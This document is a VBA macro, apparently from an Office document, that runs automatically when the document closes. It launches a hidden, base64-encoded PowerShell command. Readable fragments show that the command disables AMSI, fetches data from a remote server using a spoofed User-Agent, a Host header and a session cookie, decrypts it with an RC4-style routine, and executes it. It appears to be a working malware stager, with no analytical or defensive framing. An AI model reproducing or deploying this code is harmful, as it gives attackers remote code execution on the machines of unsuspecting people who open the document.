Sub AutoClose()
	FiNlKeYoXeS
End Sub

Public Function FiNlKeYoXeS() As Variant
	Dim nqOpEKafeikexSbZ As String
	nqOpEKafeikexSbZ = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "UAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "QARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "bABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "B0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AGwALAAkAHQAcgB1AGUAKQA7AH0AOwBbAFMAeQBzAHQAZQBtAC"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "bgBhAGcAZQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMAbw"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BuAHQAaQBuAHUAZQA9ADAAOwAkAEsAPQBbAFMAeQBzAHQAZQBt"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAF"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "MAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAdgBWAF4A"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "WQA6AEYAdABmAEMAWABUACwAPQBhAEEATQA/AGoAIwA3AE8AUQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BwAF0AJgByAHwAWwBaAHgAbgAnACkAOwAkAFIAPQB7ACQARAAs"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1AD"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "sAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "WwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABK"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAE"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "QAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "SAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABd"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbAC"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "gAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "XQB9AH0AOwAkAHcAYwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBu"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AHQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "UwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARg"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBB"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AE"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "EARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "QQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAeQBBAEQAZwBBAE8AZw"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAHcAcAAt"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AGMAbwBuAHQAZQBuAHQALwB0AGgAZQBtAGUAcwAvAHcAcAAtAG"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "YAcgBvAG4AdAAuAHAAaABwACcAOwAkAHcAYwAuAFAAcgBvAHgA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "eQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAG"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "QAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4A"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "TgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwBy"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AF"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "dwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBVAHMAZQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ByAC0AQQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA1"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzAD"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "sAIABXAGkAbgA2ADQAOwAgAHgANgA0ACkAIABBAHAAcABsAGUA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "VwBlAGIASwBpAHQALwA1ADMANwAuADMANgAgACgASwBIAFQATQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BMACwAIABsAGkAawBlACAARwBlAGMAawBvACkAIABDAGgAcgBv"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AG0AZQAvADcAOQAuADAALgAzADkANAA1AC4AOAA4ACAAUwBhAG"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "YAYQByAGkALwA1ADMANwAuADMANgAiACkAOwB0AHIAeQB7ACQA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "aQBnAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AoACQAcwBlAHIAKQB9AGMAYQB0AGMAaAB7AH0AOwAkAHcAYwAu"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIASABvAHMAdAAiAC"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "wAIgB3AG0AdwBpAGYAYgBhAGoAeAB4AGIAYwB4AG0AdQBjAHgA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "bQBsAGMALgBjAG8AbQAiACkAOwAkAHcAYwAuAEgAZQBhAGQAZQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBl"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "AHMAcwBpAG8AbgA9AGoASQBWAFcAagBlAHcAagBNAHUASAAxAE"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "QAdABpAE8AcQA2ADcAWgBuAGcAbwBQAGYANgBNACUAMwBEACIA"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "KQA7ACQAZABhAHQAYQA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQ"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BkAEQAYQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAGkAdgA9"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9AC"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "QAZABhAHQAYQBbADQALgAuACgAJABkAGEAdABhAC4AbABlAG4A"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ZwB0AGgALQAxACkAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWw"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "BdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgAr"
	nqOpEKafeikexSbZ = nqOpEKafeikexSbZ + "ACQASwApACkAfABJAEUAWAA="
	Set asd = CreateObject("WScript.Shell")
	asd.Run(nqOpEKafeikexSbZ)
End Function
